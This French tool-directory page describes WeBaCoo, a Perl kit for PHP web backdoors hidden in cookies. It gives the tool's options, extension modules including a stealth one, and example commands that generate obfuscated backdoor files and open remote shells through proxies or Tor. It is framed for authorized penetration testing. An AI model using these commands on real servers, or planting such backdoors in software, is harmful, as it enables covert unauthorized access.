Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WeBaCoo — Kit de script de cookie backdoor Web | Kitploit
Outils/GitHubGitHub/anestisb/webacoo
Génération de PayloadsSécurité WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubanestisb/webacoo

WeBaCoo

Kit de script de cookie backdoor Web

Voir le dépôt
18642il y a 14 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \ \ /\ / __/ |/ / (
| | _/\ () | (_) | / / _
_/ _,|_/_/ _/

root@kitploit:~
 Web Backdoor Cookie Script-Kit

Écrit par : Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis

Avertissement

L'outil est uniquement à des fins de test et ne peut être utilisé qu'avec un consentement explicite. Ne l'utilisez pas à des fins illégales.

Licence

Toute modification, changement ou altération de cette application est acceptable, cependant, toute publication publique utilisant ce code doit être approuvée par son créateur. Consultez le fichier LICENSE pour plus d'informations.

Prérequis

  • perl installé
  • liburi-perl
  • libio-socket-socks-perl

Si vous ne souhaitez pas installer "libio-socket-socks-perl" pour la fonctionnalité de proxy Tor, commentez la ligne 25 dans webacoo.pl

Utilisation

webacoo.pl [options]

Options : -g Générer le code de backdoor (-o est requis)

-f FONCTION Fonction système PHP à utiliser FONCTION 1: system (par défaut) 2: shell_exec 3: exec 4: passthru 5: popen

-o SORTIE Nom du fichier de sortie de la backdoor générée

-r Retourner le code de backdoor non obfusqué

-t Établir une connexion "terminal" distante (-u est requis)

-u URL URL de la backdoor

-e CMD Mode d'exécution d'une seule commande (-t et -u sont requis)

-m MÉTHODE Méthode HTTP à utiliser (par défaut "GET")

-c N_COOKIE Nom du cookie (par défaut : "M-cookie")

-d DÉLIM Délimiteur (par défaut : nouveau aléatoire à chaque requête)

-a AGENT User-agent de l'en-tête HTTP (par défaut existant)

-p PROXY Utiliser un proxy (tor, ip:port ou user:pass:ip:port)

-v NIVEAU Niveau de verbosité NIVEAU 0: aucune information supplémentaire (par défaut) 1: afficher les en-têtes HTTP 2: afficher les en-têtes HTTP + données

-l LOG Journaliser l'activité dans un fichier

-h Afficher l'aide et quitter

update Vérifier les mises à jour et les appliquer le cas échéant

Modules d'extension

Depuis la version 0.2.1, un support de modules d'extension a été ajouté pour fournir des fonctionnalités supplémentaires à WeBaCoo. En mode terminal, vous pouvez exécuter 'load' pour lister les modules disponibles et initialiser celui souhaité depuis la liste. En tapant 'unload', vous revenez au mode terminal initial.

Modules d'extension disponibles : o mysql-cli Module ligne de commande MySQL o psql-cli Module ligne de commande Postgres o upload Module de téléversement de fichier via HTTP Post o download Module de téléchargement de fichier via impression stdout avec 'od' et 'xxd' o stealth Module d'augmentation de furtivité via la gestion .htaccess

Exemples

  1. Créer une backdoor obfusquée 'backdoor.php' avec les paramètres par défaut ./webacoo.pl -g -o backdoor.php

  2. Créer une backdoor non obfusquée 'raw-backdoor.php' en utilisant la fonction 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

  3. Établir une connexion "terminal" avec l'hôte distant en utilisant la configuration par défaut ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

  4. Établir une connexion "terminal" avec l'hôte distant tout en définissant quelques arguments ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

  5. Établir une connexion "terminal" avec l'hôte distant via un proxy HTTP local ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

  6. Établir une connexion "terminal" avec l'hôte distant via un proxy HTTP avec authentification de base ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

  7. Établir une connexion "terminal" avec l'hôte distant via Tor et journaliser l'activité ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

Télécharger l’outil